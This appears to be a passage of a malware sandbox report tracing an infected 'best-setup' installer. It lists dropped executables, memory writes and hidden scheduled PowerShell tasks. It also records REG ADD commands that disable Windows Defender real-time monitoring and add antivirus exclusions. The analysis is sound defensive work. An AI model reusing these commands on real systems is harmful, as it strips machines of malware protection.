N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A
N/A N/A C:\Windows\Temp\HsdHtTcNAoJBjrVs\alzQmMPVnagPWdm\kEFCWpl.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SoundBose.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1992 wrote to memory of 1032 N/A C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 728 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1032 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1032 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1032 wrote to memory of 760 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Windows\SysWOW64\schtasks.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1032 wrote to memory of 1476 N/A C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 1952 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe
PID 1476 wrote to memory of 900 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe
PID 1476 wrote to memory of 900 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe
PID 1476 wrote to memory of 900 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe
PID 1476 wrote to memory of 900 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe
PID 1476 wrote to memory of 1924 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe
PID 1476 wrote to memory of 692 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe
PID 1476 wrote to memory of 1996 N/A C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe
PID 1996 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe C:\Windows\SysWOW64\forfiles.exe
PID 1996 wrote to memory of 1492 N/A C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe C:\Windows\SysWOW64\forfiles.exe
PID 1596 wrote to memory of 300 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe
PID 1492 wrote to memory of 796 N/A C:\Windows\SysWOW64\forfiles.exe C:\Windows\SysWOW64\cmd.exe

Processes

C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe

"C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"

C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp

"C:\Users\Admin\AppData\Local\Temp\is-L7F66.tmp\best-setup_FLc4rckO.tmp" /SL5="$70126,4965743,52224,C:\Users\Admin\AppData\Local\Temp\infected\best-setup_FLc4rckO.exe"

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Reg Organizer 6"

C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe

"C:\Program Files (x86)\Reg Organizer\RegOrganizerAgent.exe" ad9ff40ab2841a8973dbdb0a6dca746b

C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe

C:\Users\Admin\AppData\Local\Temp\A8sIK79c\svfZpRCq63.exe

C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe

C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe /VERYSILENT

C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe

C:\Users\Admin\AppData\Local\Temp\4ptT0ZuA\0tvdpzuB9yWiq1On.exe /sid=3 /pid=449

C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe

C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b

C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe

C:\Users\Admin\AppData\Local\Temp\qf9qIpd3\5ByuM.exe /S /site_id=757674

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

C:\Users\Admin\AppData\Roaming\InfoInstall\InfoInstall.exe

C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe

C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe

C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp

"C:\Users\Admin\AppData\Local\Temp\is-S2V10.tmp\EdL8iSHGnMSs6MTcpU.tmp" /SL5="$2023E,990754,54272,C:\Users\Admin\AppData\Local\Temp\FaIOXtKt\EdL8iSHGnMSs6MTcpU.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b

C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp

"C:\Users\Admin\AppData\Local\Temp\is-R730P.tmp\SCLt3f0W7iK6UwxVd.tmp" /SL5="$30242,2567431,54272,C:\Users\Admin\AppData\Local\Temp\Uc0mQDyj\SCLt3f0W7iK6UwxVd.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gSRPiGqxS" /SC once /ST 17:12:00 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Users\Admin\AppData\Local\Temp\SoundBose.exe

C:\Users\Admin\AppData\Local\Temp\SoundBose.exe

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\system32\schtasks.exe" /Delete /F /TN "Scan Rename"

C:\Program Files (x86)\ScanRename\ScanRename.exe

"C:\Program Files (x86)\ScanRename\ScanRename.exe" /u SUB=ad9ff40ab2841a8973dbdb0a6dca746b

C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe

"C:\Program Files (x86)\Any Drive Formatter\Any Drive Format.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gSRPiGqxS"

C:\Windows\system32\taskeng.exe

taskeng.exe {462DC29C-DE10-415F-9641-E7C058AA9F44} S-1-5-21-3385717845-2518323428-350143044-1000:SABDUHNY\Admin:Interactive:[1]

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /c taskkill /im "ScanRename.exe" /f & erase "C:\Program Files (x86)\ScanRename\ScanRename.exe" & exit

C:\Windows\SysWOW64\taskkill.exe

taskkill /im "ScanRename.exe" /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gSRPiGqxS"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bGAvhKhnIPTNQeobsw" /SC once /ST 18:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe\" bt /site_id 757674 /S" /V1 /F

C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe

C:\Users\Admin\AppData\Local\Temp\SoundBoseRemove.exe

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /k ping 0 & del C:\Users\Admin\AppData\Local\Temp\Ft8isKJ5\zI9VJZP2WFNnHYj20.exe & exit

C:\Windows\system32\PING.EXE

ping 0

C:\Windows\system32\taskeng.exe

taskeng.exe {AEE7CBD2-A691-464C-9512-8E447F9C410D} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe

C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy\vZixTOWAjXczfOR\DOgvvll.exe bt /site_id 757674 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gdoyoZnzk" /SC once /ST 12:07:49 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gdoyoZnzk"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gdoyoZnzk"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gZmPYbiLE" /SC once /ST 06:42:55 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gZmPYbiLE"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gZmPYbiLE"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd /C copy nul "C:\Windows\Temp\HsdHtTcNAoJBjrVs\FxXpZakA\AbtnDxAOktyFDgsF.wsf"

C:\Windows\SysWOW64\wscript.exe

wscript "C:\Windows\Temp\HsdHtTcNAoJBjrVs\FxXpZakA\AbtnDxAOktyFDgsF.wsf"

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OdCkbftzuRPDCLooswR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\WyuevociGfNU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XxxUzwYQU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\unWhUoTpcLxwC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\FZMYpcBymcbXiuVB" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\FZMYpcBymcbXiuVB" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\UwoKNgjfMpAQohzjy" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\HsdHtTcNAoJBjrVs" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NxGlAgQUfzUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

